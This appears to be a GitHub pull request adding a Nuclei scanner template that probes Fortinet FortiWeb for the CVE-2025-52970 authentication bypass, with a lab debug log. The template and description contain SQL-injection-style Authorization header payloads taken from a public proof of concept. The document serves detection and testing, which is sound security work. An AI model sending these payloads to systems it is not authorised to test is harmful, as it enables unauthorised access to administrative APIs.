### PR TITLE
Add CVE-2025-52970 Fortinet FortiWeb Auth Bypass detection template

### DIFF
--- a/http/cves/2025/CVE-2025-52970.yaml
+++ b/http/cves/2025/CVE-2025-52970.yaml
@@ -1,0 +1,88 @@
+id: CVE-2025-52970
+info:
+  name: Fortinet FortiWeb - CVE-2025-52970 (Broken Access Control / Auth Bypass) - Non-destructive Probes
+  author: gsharma101
+  severity: high
+  description: |
+    Non-destructive probes for an authentication bypass vulnerability in Fortinet FortiWeb (CVE-2025-52970).
+    Vulnerable versions improperly handle Authorization header parameters, allowing unauthenticated attackers
+    to bypass access control. This template performs safe, read-only requests to /api/fabric/device/status
+    with crafted Authorization headers. It flags responses where the server unexpectedly returns 200/500 along
+    with JSON fields like token, role, or super_admin. The template avoids destructive SQLi/file-write actions
+    from the public exploit chain.
+  reference:
+    - https://pwner.gg/blog/2025-08-13-fortiweb-cve-2025-52970
+    - https://github.com/Hex00-0x4/FortiWeb-CVE-2025-52970-Authentication-Bypass
+  tags: fortinet,fortiweb,cve-2025-52970,auth-bypass
+  classification:
+    cve-id: "CVE-2025-52970"
+
+requests:
+  - id: probe-bearer-test
+    method: GET
+    path:
+      - "{{BaseURL}}/api/fabric/device/status"
+    headers:
+      Authorization: "Bearer ';test"
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+          - 500
+      - type: word
+        words:
+          - "token"
+          - "\"role\""
+          - "super_admin"
+        part: body
+      - type: word
+        words:
+          - "application/json"
+        part: header
+
+  - id: probe-bearer-comment
+    method: GET
+    path:
+      - "{{BaseURL}}/api/fabric/device/status"
+    headers:
+      Authorization: "Bearer ';--"
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+          - 500
+      - type: word
+        words:
+          - "token"
+          - "\"role\""
+          - "super_admin"
+        part: body
+      - type: word
+        words:
+          - "application/json"
+        part: header
+
+  - id: probe-bearer-escaped
+    method: GET
+    path:
+      - "{{BaseURL}}/api/fabric/device/status"
+    headers:
+      Authorization: "Bearer '\\';--"
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+          - 500
+      - type: word
+        words:
+          - "token"
+          - "\"role\""
+          - "super_admin"
+        part: body
+      - type: word
+        words:
+          - "application/json"
+        part: header


### PR DESCRIPTION
### Template / PR Information

- Added CVE-2025-52970 Fortinet FortiWeb Auth Bypass detection template
- References:
  - https://pwner.gg/blog/2025-08-13-fortiweb-cve-2025-52970
  - https://github.com/Hex00-0x4/FortiWeb-CVE-2025-52970-Authentication-Bypass
  - https://fortiguard.fortinet.com/psirt/FG-IR-25-448

### Template Validation

I've validated this template locally?
- [x] YES
- [ ] NO

#### Additional Details 

- Detection logic:
  - Sends non-destructive GET requests to `/api/fabric/device/status`
  - Uses crafted Authorization header payloads from the public PoC:
    - `Authorization: Bearer ';test`
    - `Authorization: Bearer ';--`
    - `Authorization: Bearer '\';--`
  - Unique matchers are used:
    - Status: `200` or `500`
    - Body: `token`, `"role"`, `super_admin`
    - Header: `application/json`
  - Safe and read-only detection, no destructive SQLi/file-write actions.

- Lab setup:
  - Tested on FortiWeb VM 7.6.3 build1043 in VirtualBox
  - Verified requests and responses using nuclei with `-debug`
  - Debug evidence attached (`CVE-2025-52970_debug.txt`)

- Debug evidence (excerpt):
  ```
  [INF] [CVE-2025-52970] Dumped HTTP request for https://192.168.1.99/api/fabric/device/status
  
  GET /api/fabric/device/status HTTP/1.1
  Host: 192.168.1.99
  User-Agent: Mozilla/5.0 (SS; Linux i686; rv:128.0) Gecko/20100101 Firefox/128.0
  Connection: close
  Accept: */*
  Accept-Language: en
  Authorization: Bearer ';test
  Accept-Encoding: gzip
  
  
  [DBG] [CVE-2025-52970] Dumped HTTP response https://192.168.1.99/api/fabric/device/status
  
  HTTP/1.1 401 Unauthorized
  Connection: close
  Content-Security-Policy: Script-Src 'self', frame-ancestors 'self'; Object-Src 'self'; base-uri 'self';
  Date: Tue, 09 Sep 2025 04:27:58 GMT
  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
  X-Content-Type-Options: nosniff
  X-Frame-Options: S
  ```

#### FullFull debug log file [CVE-2025-52970_debug.txt](https://github.com/user-attachments/files/22226298/CVE-2025-52970_debug.txt)


### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)

